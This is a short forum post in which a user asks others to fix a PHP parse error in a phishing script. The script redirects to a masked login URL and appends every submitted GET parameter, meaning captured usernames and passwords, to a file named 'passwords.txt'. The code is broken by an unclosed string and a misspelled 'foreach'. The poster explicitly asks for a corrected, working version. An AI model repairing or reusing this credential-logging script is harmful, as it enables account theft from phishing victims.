Now I have fixed that error but a new error is coming
Its giving the error
Parse error: parse error, unexpected $end in line 14
<?php
header("Location: [url]https://****************cool1581997/login.php[/url]
$handle = fopen('passwords.txt', 'a') ;
forecah($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ">");
fwrite($handle, $value);
fwrite($handle, '\r\n');
}
fwrite($handle, '\r\n');
fclose($handle);
exit;
?>
Plss help by posting the correct script .
Thanks in advance.